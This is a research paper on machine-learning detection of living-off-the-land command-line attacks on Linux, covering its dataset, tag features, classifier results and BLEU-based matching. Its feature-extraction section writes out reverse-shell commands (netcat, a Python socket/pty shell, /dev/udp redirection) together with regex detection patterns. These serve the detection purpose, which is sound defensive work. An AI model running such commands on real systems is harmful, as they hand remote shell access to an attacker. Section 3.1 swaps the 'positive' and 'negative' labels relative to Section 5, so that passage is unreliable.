Machine Learning and Feature Engineering for Detecting Living off the

Land Attacks

Tiberiu Boros

, Andrei Cotaie

, Antrei Stan

, Kumar Vikramjeet

, Vivek Malik

and Joseph Davidson

Adobe Systems, Romania

Adobe Systems, U.S.A.

Keywords:

Machine Learning, Living-off-the-Land (LotL), Feature Engineering, Artiﬁcial Intelligence, Random Forest,

Commands, CommandLine, OpenSource, Linux.

Abstract:

Among the methods used by attackers to avoid detection, living off the land is particularly hard to detect. One

of the main reasons is the thin line between what is actually operational/admin activity and what is malicious

activity. Also, as shown by other research, this type of attack detection is underrepresented in Anti-Virus

(AV) software, mainly because of the high risk of false positives. Our research focuses on detecting this type

of attack through the use of machine learning. We greatly reduce the number of false detection by corpora

design and specialized feature engineering which brings in-domain human expert knowledge. Our code is

open-source and we provide pre-trained models.

1 INTRODUCTION

Attackers spend a lot of time trying to trick and cir-

cumvent sophisticated malware detection algorithms

that are present in modern AV software. A particu-

larly interesting method is to rely on binaries and tools

that are often part of the base operating system (OS)

distribution to perform reconnaissance, privilege es-

calation and lateral movement. Because it leverages

what is already present in the system, this technique

is called living off the land (LotL) and it is hard to

detect for several reasons:

• Context: When analyzed on its own, the ex-

ecution of a speciﬁc standard binary might not

provide sufﬁcient evidence of malicious activity.

This is the case for most reconnaissance activities

which might look like normal applications check-

ing for privileges or trying to ﬁnd if a service is up

or not on a remote host;

• Scope: Most of the LotL tools and binaries

are normally used by system administrators and

power users to achieve goals that are sometimes

indistinguishable from those of the attackers (e.g.

add a new user or change a password). Also, some

legitimate software installers are known to use a

similar approach. This renders the line between

administrative operations and malicious activities

thin;

• Reliability: Based on the double scope of these

tools, it is likely that the detection mechanisms

would generate false positives, which could some-

times block normal operations for legitimate soft-

ware and cause outages in corporate networks

(where there is a higher level of administra-

tive/power user operations than on home sys-

tems).

The motivation for the present research comes

from Barr-Smith et al. (2021), where the researchers

focus on the evasion rate of LotL-based malware, con-

cluding that the detection of LotL attacks is under rep-

resented in modern AV software.

In the present work we propose a system aimed at

highlighting LotL related-activity on a given host. We

mitigate some issues related to data sparsity and false

positives (see Section 3 for clariﬁcations) through

our feature-engineering process (which is described

in section 3.2) and through the way we design our

dataset (Section 3.1). Also, we rely on a classical ap-

proach to machine learning: feature engineering and

well-established classiﬁers. To account for this we

argue that in theory, a deep-learning approach could

provide superior results, but the classical process al-

lows for hand-crafted exceptions and it makes it easy

to explain the results and see where and why the sys-

Boros, T., Cotaie, A., Stan, A., Vikramjeet, K., Malik, V. and Davidson, J.

Machine Learning and Feature Engineering for Detecting Living off the Land Attacks.

DOI: 10.5220/0011004500003194

In Proceedings of the 7th International Conference on Internet of Things, Big Data and Security (IoTBDS 2022), pages 133-140

ISBN: 978-989-758-564-7; ISSN: 2184-4976

133

tem fails.

Because a large-scale LotL dataset is hard to ob-

tain, we had to build our own corpus in order to train

and test the models. We describe the process we used

and we include the open-source repositories that we

collected malicious examples from. Everything de-

scribed in this paper is currently freely available as

an open-source repository (link provided in Section

6) and a PIP package with pre-trained models (lolc).

However, we are unable to share the corpus because

the benign examples could contain sensitive informa-

tion. Instead, we offer insights into our data and tag

distribution (Section 5).

2 RELATED WORK

Whether or not we are concerned about LotL detec-

tion, intrusion detection systems fall in two main cate-

gories: (a) Signature-Based (SB) and Anomaly-Based

(AB).

Signature-Based detection relies on identifying

patterns of commands that were previously observed

to have been misused in other attacks Modi et al.

(2013). With a high number of rules comes a high

accuracy. However, it generalizes poorly on new at-

tack methods and, to our knowledge, the most efﬁ-

cient way to automatically catch and generate rules

for new attacks methods is through the use of honey

pots Kreibich and Crowcroft (2004). The later men-

tioned come with their own ups and downs, which

will not be discussed here, except for the fact that,

in time, attackers learn how to detect and avoid honey

pots themselves.

Anomaly-Based detection relies on modeling,

usually through statistics, what can be regarded as

normal operations and on alerting whenever a sys-

tem or application falls outside the normal behaviour

Boros et al. (2021); Butun et al. (2013); Lee et al.

(1999); Silveira and Diot (2010)

. They can either

rely on directly modeling a monitored system or on

computing the model based on a preexisting data-

setDurst et al. (1999), though the later would nor-

mally fall into the supervised learning class, rather

than the unsupervised (anomaly-based) class. While

all AB systems are better at adapting and detecting

new attack methods, purely unsupervised methods

usually yield a higher number of false positives than

their supervised counterparts. On the other hand, su-

pervised methods are better at avoiding false alerts,

Some of the cited work, refers to network based

anomaly detection. The basic ideas and principles still ap-

ply for LotLs detection, but the volume of data is much

lower.

but they are only as good as the labeled data they are

trained on, thus requiring periodic updates and higher

maintenance.

Notice: This research only focuses on misuse

of LotL binaries and tools. It might seem obvious

for most security experts, but we are going to say

it anyway: Relying on just one type of detection,

including LotLs detection, is not effective from the

security standpoint. Only by combining signature

based, anomaly based, network proﬁling, obfusca-

tion detection, system auditing and all the other well-

established methods, a Defense in Depth approach,

can one obtain a decent level of security and safety.

3 PROPOSED METHODOLOGY

Our methodology can be classiﬁed as a special case of

signature based intrusion detection that employs ma-

chine learning for modeling. There are two main ML

related issues we need to take into consideration:

(a) Data Sparsity: A naive approach would be to

rely on n-gram related features that can be easily ex-

tracted from the command-lines in the dataset. This is

probably one of the most common approaches when

it comes to using ML on text data. However, this re-

sults in a rich feature set, which in turn generates data

sparsity and enables the model to quickly over-ﬁt the

dataset and generalize poorly on previously unseen

examples.

(b) False Positives: Given the skewed nature of

real-life data

, there is always a “power-struggle” be-

tween precision (how many of the examples that are

marked as malicious are actually labeled correctly)

and recall (how many of the malicious examples from

the overall mass are actually identiﬁed). This is best

captured by speciﬁc metrics for skewed datasets, such

as the F-Score.

In order to mitigate data sparsity we used a fea-

ture extraction scheme that is mostly manually de-

signed and incorporates lots of human-expert knowl-

edge. This keeps the feature-set to a decent size and

focuses mostly on features that weigh heavily on the

decision of the classiﬁer (as opposed to automatically

extracted features, such as n-grams, that would proba-

bly introduce a lot of useless information). To address

false positives, we manually compile our dataset and

we use a huge ratio between benign and malign exam-

ples. Also, we repeatedly tweaked our feature extrac-

tion scheme and retrained our classiﬁer, until we ob-

tained a high f-score, with the following mentioned:

In a standard and relatively secure environment, most

of the collected data will probably be benign, and not mali-

cious

IoTBDS 2022 - 7th International Conference on Internet of Things, Big Data and Security

134

Figure 1: Our proposed methodology: (a) take raw data, (b) add labels for known commands, interesting paths, commandline

parameters, known patterns, (c) get enriched dataset and (d) apply classiﬁer on generated labels.

whenever the case, we preferred to reduce the recall

at the expense of the f-score, rather than have a clas-

siﬁer that generates a lot of noise and ends up being

ignored by security analysts over time.

In what follows, we describe our dataset (Section

3.1), discuss our feature extraction scheme (Section

3.2) and evaluate our system (Section 4)

3.1 Corpora Description

Our primarily focus is to build a model that takes

as input raw command-lines and is able to detect if

they are used in LotL attacks. One challenging as-

pect of any ML-based approach is getting high quality

data to train on. To our knowledge, there is no com-

plete dataset that enables this. However, it is fairly

easy to get negative examples from multiple online

resources

. Thus we started by collecting all avail-

able examples of known LotL attacks and we manu-

ally ﬁltered the dataset for ambiguous commands, by

removing any command that, taken on its own, could

be used in both attacks or normal operations, such as:

$ stat ˜/.ssh

$ iptables -L -n

Our data was collected from the following

urls: https://gtfobins.github.io/ and https://lolbas-

project.github.io/

The total number of negative examples at the end

of this process was 1609. For collecting the posi-

tive examples we used our own infrastructure logs,

removed duplicates and performed random sampling.

In order to correctly detect duplicates we used an

open-source tool called Stringliﬁer

, which is able to

spot random strings, GUIDs, numbers, IP Addresses

and JWT tokens, thus enabling us to establish when

two string instances are actually the same command-

line with different parameters. We assumed that ran-

domly selecting the positive examples is likely to cap-

ture normal operations and has a less chance of hitting

sys-admin/power-user activity. We also preferred an

unbalanced dataset (only 0.02% negative examples)

because it better reﬂects real-life data and, with the

right feature engineering and tweaking, one can build

a robust classiﬁer with a low false-positive rate and

good recall.

3.2 Feature Extraction and Modeling

Our feature extraction process is primarily inspired

by human experts and analysts. During analyzing

a command-line, people rely on certain cues, such

as what binaries are being used, what paths are ac-

cessed, they quickly browse through parameters and,

if present, they look at domain names, IP addresses

https://github.com/adobe/stringliﬁer

Machine Learning and Feature Engineering for Detecting Living off the Land Attacks

135

Table 1: k-fold validation results for random forest (with 50 estimators), SVM and Logistic Regression with k=5.

Classiﬁer F1-score Standard deviation Avg. train time

Random forest 0.95 0.013 18 minutes

SVM 0.95 0.027 3.5 hours

Logistic regression 0.93 0.014 1.2 hours

ports. Thus we designed special labels for the follow-

ing classes of features:

1. Binaries: We look for a list of common linux

binaries, regardless if they are part of LotL at-

tacks or not. Whenever we encounter a known

binary we tag the training example with a spe-

ciﬁc label that identiﬁes the feature class (for later

analysis of the results) and the binary. For ex-

ample, “nc -e sh 10.20.30.40 1234” will re-

ceive two labels: CMD_NC and CMD_SH;

2. Paths: We compiled a limited list of inter-

esting paths that are usually in attacks such

as temporary locations that don’t require any

special writing permissions, special devices

found in “/dev/”, known locations for sensi-

tive data (e.g. “˜/.ssh/”), etc. For example,

“sh -i >& /dev/udp/(...)”, will receive the

label PATH_DEV_UDP;

3. Parameters: Similarly to paths and bi-

naries, we also label common parame-

ters, using a similar schema: command

“nc -e sh 10.20.30.40 1234” will also

receive the label “PARAM_E”;

4. Networking: We look for cues of networking

in all command-lines, such as protocol names

(e.g. http, ftp) domain names and IP addresses.

For IP addresses we distinguish between private,

public, all and loopback. For clarity, the com-

mand “nc -e sh 10.20.30.40 1234”, will re-

ceive the label IP_PRIVATE.

5. Pattern Detection: Using a list of known LotL

malicious looking commands we build a series of

regexes where purpose is to identify LotL compo-

nents in commands. For example, let’s take the

following command:

python -c ’import sys, socket, os,

pty

s=socket.socket()

s.connect((os.getenv(""RHOST""),

int(os.getenv

(""RPORT"")))

)

[os.dup2(s.fileno(),fd) for fd in

(0,1,2)]

pty.spawn(""/bin/sh"")’.

There are a couple of pieces of infor-

mation we can extract using regex. We

can detect the use of the pty library

r’python.*\-c.*pty’ or we can detect the

socket library r’python.*\-c.*socket’, the

connection itself r’python.*\-c.*\. connect’

or the shell invocation itself r’python.*\-c.

*pty.*sh’. The regexes can be more or less

permissive but the scope is to generate as much

context as possible.

For the command in the last example, the

feature extraction phase would generate tags as:

PATH /BIN/SH, COMMAND PYTHON, COM-

MAND FOR, KEYWORD -C, KEYWORD SOCKET,

KEYWORD OS, KEYWORD PTY, KEY-

WORD PTY.SPAWN, python socket, python shell,

import pty.

The classiﬁer is trained to output a binary deci-

sion LotL/non-LotL, based on the labels we previ-

ously discussed. Not adding any rich text-based fea-

tures avoids over-ﬁtting the training data. Also, by

analyzing the decision and the generated labels for

failed examples, it is fairly easy to tweak the feature

extraction process and enhance the model.

4 EVALUATION

To evaluate our approach, we performed 5-fold cross-

validation. We split the input dataset into 5 subsets

that shared the same positive/negative examples ra-

tio. We trained the classiﬁers on every combination of

4 subsets and report results as the average f1-metric

on the 5-th subset (see Table 1). We experimented

with multiple classiﬁers from Sklearn Pedregosa et al.

(2011) and we report the results for Logistic Regres-

sion, SVM(linear kernel)

and Random Forest Clas-

siﬁer Pal (2005).

In terms of accuracy, we obtained comparable re-

sults with SVMs and Random Forests. However, the

convergence speed for the latter was signiﬁcantly bet-

ter, as the implementation allowed training on mul-

tiple threads. We noted that the speed for SVMs is

The convergence speed for the SVM classiﬁer

is reported on a system with Intel Sklearn Patch

(https://github.com/intel/scikit-learn-intelex).

IoTBDS 2022 - 7th International Conference on Internet of Things, Big Data and Security

136

reported after installing the Intel Sklearn patch. With-

out this patch, the classiﬁer didn’t complete a single

fold after 8 hours.

4.1 Runtime Enhancement

This section covers a runtime enhancement, we in-

cluded in our system that is neither the scope of our

evaluation, nor it was used when we computed the

accuracy of the classiﬁer. However, it is part of the

python library we created and we feel that it has to be

presented.

As a part of the data collection, we have collected

a wide range of Living off the Land commands. It

is easy for a human to observe their malicious char-

acter but it can be hard to detect from a rule-based

approach. Slight variations of the command can es-

cape all sort of static rules in place. Pattern based

static rules which are too permissive can generate a

lot of noise and false positives. One way to try to

detect potential Living off the Land commands is to

compare new commands with well known LotL com-

mands, like the ones we collected.

One mechanism to do this similarity comparison

is by computing the BLEU Scoring distance between

two observations. The BLEU score is typically used

in Machine Translation to measure the similarity be-

tween two proposed translation of a sentence. In our

case, we considered using BLEU scoring to express

the functional similarity of two command lines that

share common patterns in the parameters (Figure 2).

In our experiments, we found that a weighted vari-

ant of BLEU is well suitable to capture command-line

patterns and also LotL commands.

If the score generated is greater than an estab-

lished score (0.7 in our implementation) the observa-

tion is attributed a KnownLoL tag. For such observa-

tion our implementation overwrites the decision of the

RandomForest classiﬁer and marks the observation as

bad. This runtime enrichment can be considered a

fail-safe mechanism to ensure that well known LotL

do not bypass the algorithm in place.

5 INSIGHTS INTO OUR DATASET

Because we are currently unable to share the dataset

we ﬁnd it useful to provide some insights regarding

its composition from the tagging perspective. For

each unique tag (t) in our dataset, we counted the

number of times it appears in benign (negative) ex-

amples and how many times it appears with mali-

cious/LotL (positive) examples. We refer to these

metrics as C

n(t)

and respectively C

p(t)

. Given the

skewness of our dataset we compute the “log plus

1” equivalents for this metrics for graphical repre-

sentations as: L

np1(t)

= log(C

n(t)

+ 1) and L

pp1(t)

log(C

p(t)

+1). Finally, we add the safe ratio metric as

(t) = (C

p(t)

+ 1)/(C

n(t)

+ 1), for highlighting tags

that have a bias toward positive or negative examples.

Table 2 shows the metrics for the top-30 high fre-

quent tags in both positive and negative example, and

Figure 3 compares the distribution between the two

classes on the log scale for the top-30 frequent tags.

Similarly, Figure 4 shows the same distributions but

for tags that have a high occurrence rate in positive

examples (ordered by C

p(t)

descending) while Figure

5 highlights tags that have a bias toward positive ex-

amples (ordered by S

r(t)

descending).

Based of Figure 5, one can easily observe

that tags such as “lua socket”, “OS EXECUTE”,

“PTY SPAWN”, etc. have a high tendency to ap-

pear in LotL attacks. One notable outlier is “COM-

MAND RVIM” which can be observed in a signiﬁ-

cant number of benign examples. However, Figures 3

and 4 show an overwhelming mostly benign tendency

for the tags they highlight, which suggests that these

tags can never be used as sole indicators for LotL ac-

tivity.

The ﬁnal metrics that we present about the dataset

is the average number of tags, 1.73 for benign exam-

ples and 6.40 for malign commands. This shows that

our tags primarily target keywords and commands

that are found in LotL attacks. Interestingly, the max-

imum number of tags generated for a benign example

is 30 (a long automation script), whereas the maxi-

mum number of tags generated for a malign example

is only 19 (also a long script).

6 CONCLUSIONS AND FUTURE

WORK

We addressed the issue of detecting Living off the

Land attacks and introduced a ML based method to

handle this. The source code is freely available on

GitHub

and we provide pre-trained models (for the

Random Forest Classiﬁer) as well as PIP packag-

ing for easy installation and integration with other

projects.

This is only one small step in the direction of han-

dling this type of attacks, but we feel that it is an im-

portant one, especially because this is a community

contribution.

Currently this is a “state-less” approach, meaning

that it analyzes each command on a stand-alone man-

https://github.com/adobe/libLOL

Machine Learning and Feature Engineering for Detecting Living off the Land Attacks

137

Figure 2: BLEU scoring strategy. Compute BLEU of a new observation using a known list of Living off the Land commands.

Attribute a KnownLoL label if the score provided is greater than a speciﬁed threshold.

Figure 3: The distribution of most frequent tags between negative(benign) and positive(malicious) examples, computed on a

log scale.

Figure 4: The distribution of most frequent positive tags between negative(benign) and positive(malicious) examples, com-

puted on a log scale.

IoTBDS 2022 - 7th International Conference on Internet of Things, Big Data and Security

138

Figure 5: The distribution of most frequent positive tags between negative(benign) and positive(malicious) examples, com-

puted on a log scale.

Table 2: Statistics related to the top 30 tags based on their frequency inside our dataset.

Tag C

n(t)

p(t)

np1(t)

pp1(t)

(t) Total

IP PRIVATE 2207350 170 6,343871398 2,23299611 7,74684E-05 2207520

PATH /TMP/ 2138210 57 6,330050559 1,763427994 2,71255E-05 2138267

hadoop 1814008 0 6,258639437 0 5,51265E-07 1814008

KEYWORD -C 1690794 325 6,228090955 2,5132176 0,000192809 1691119

KEYWORD -P 1564014 101 6,194240914 2,008600172 6,52168E-05 1564115

KEYWORD -R 1466919 80 6,16640643 1,908485019 5,52177E-05 1466999

KEYWORD -L 1331186 37 6,124239068 1,579783597 2,8546E-05 1331223

sh script 1325071 30 6,122239477 1,491361694 2,3395E-05 1325101

KEYWORD -U 1294020 31 6,111941324 1,505149978 2,47291E-05 1294051

KEYWORD -N 1290764 21 6,110847181 1,342422681 1,70442E-05 1290785

KEYWORD -B 1264105 18 6,101783493 1,278753601 1,50304E-05 1264123

splunk 697940 1 5,843818711 0,301029996 2,86557E-06 697941

KEYWORD -O 642962 62 5,808185982 1,799340549 9,79839E-05 643024

COMMAND JAVA 580453 0 5,763767808 0 1,72279E-06 580453

KEYWORD -T 421556 15 5,624856305 1,204119983 3,79545E-05 421571

path etc 286768 39 5,457532202 1,602059991 0,000139485 286807

bash enable library 278936 2 5,445506126 0,477121255 1,07551E-05 278938

KEYWORD -F 277278 45 5,442916979 1,662757832 0,000165898 277323

PATH /BIN/SH 256605 406 5,409266807 2,609594409 0,001586089 257011

COMMAND PYTHON 254365 70 5,405459061 1,851258349 0,000279125 254435

KEYWORD -I 249437 134 5,396962616 2,130333768 0,000541217 249571

jenkins 220177 1 5,342773922 0,301029996 9,08356E-06 220178

https con 199794 25 5,300584616 1,414973348 0,000130133 199819

KEYWORD SH 196318 173 5,292962333 2,240549248 0,000886313 196491

COMMAND BASH 191233 72 5,281565109 1,86332286 0,000381731 191305

KEYWORD BASH 191233 72 5,281565109 1,86332286 0,000381731 191305

PATH /BIN/BASH 186057 39 5,269648348 1,602059991 0,000214987 186096

ping p 154827 5 5,189849504 0,77815125 3,87527E-05 154832

jar script 144942 0 5,161197246 0 6,89926E-06 144942

COMMAND GREP 133265 25 5,124719362 1,414973348 0,000195099 133290

COMMAND SUDO 128947 391 5,110414611 2,593286067 0,003039985 129338

COMMAND POSTGRES 129096 0 5,11091615 0 7,74611E-06 129096

Machine Learning and Feature Engineering for Detecting Living off the Land Attacks

139

ner. Our future research will extend to processing se-

quences of commands, as this type of analysis is bet-

ter suited for detecting complex LotL-based attacks.

Another goal is to be able to share the dataset we

created and to provide researchers with a common

ground to experiment and compare models. This is an

extremely difﬁcult task, since the benign examples re-

quire sanitation in order to remove any sensitive data

or intellectual property. The alternative is to create

an artiﬁcial dataset based on out-of-the-box operating

system and software installation, but this will likely

not accurately reﬂect custom designed automation,

which is present in most enterprise environments.

REFERENCES

Barr-Smith, F., Ugarte-Pedrero, X., Graziano, M., Spolaor,

R., and Martinovic, I. (2021). Survivalism: System-

atic analysis of windows malware living-off-the-land.

In Proceedings of the IEEE Symposium on Security

and Privacy. Institute of Electrical and Electronics

Engineers.

Boros, T., Cotaie, A., Vikramjeet, K., Malik, V., Park,

L., and Pachis, N. (2021). A principled approach to

enriching security-related data for running processes

through statistics and natural language processing.

IoTBDS 2021 - 6th International Conference on In-

ternet of Things, Big Data and Security.

Butun, I., Morgera, S. D., and Sankar, R. (2013). A sur-

vey of intrusion detection systems in wireless sensor

networks. IEEE communications surveys & tutorials,

16(1):266–282.

Durst, R., Champion, T., Witten, B., Miller, E., and Spag-

nuolo, L. (1999). Testing and evaluating computer

intrusion detection systems. Communications of the

ACM, 42(7):53–61.

Kreibich, C. and Crowcroft, J. (2004). Honeycomb: cre-

ating intrusion detection signatures using honeypots.

ACM SIGCOMM computer communication review,

34(1):51–56.

Lee, W., Stolfo, S. J., and Mok, K. W. (1999). A data min-

ing framework for building intrusion detection mod-

els. Proceedings of the 1999 IEEE Symposium on Se-

curity and Privacy (Cat. No. 99CB36344), pages 120–

132.

Modi, C., Patel, D., Borisaniya, B., Patel, H., Patel, A., and

Rajarajan, M. (2013). A survey of intrusion detection

techniques in cloud. Journal of network and computer

applications, 36(1):42–57.

Pal, M. (2005). Random forest classiﬁer for remote sensing

classiﬁcation. International journal of remote sensing,

26(1):217–222.

Pedregosa, F., Varoquaux, G., Gramfort, A., Michel, V.,

Thirion, B., Grisel, O., Blondel, M., Prettenhofer,

P., Weiss, R., Dubourg, V., Vanderplas, J., Passos,

A., Cournapeau, D., Brucher, M., Perrot, M., and

Duchesnay, E. (2011). Scikit-learn: Machine learning

in Python. Journal of Machine Learning Research,

12:2825–2830.

Silveira, F. and Diot, C. (2010). Urca: Pulling out anomalies

by their root causes. 2010 Proceedings IEEE INFO-

COM, pages 1–9.

IoTBDS 2022 - 7th International Conference on Internet of Things, Big Data and Security

140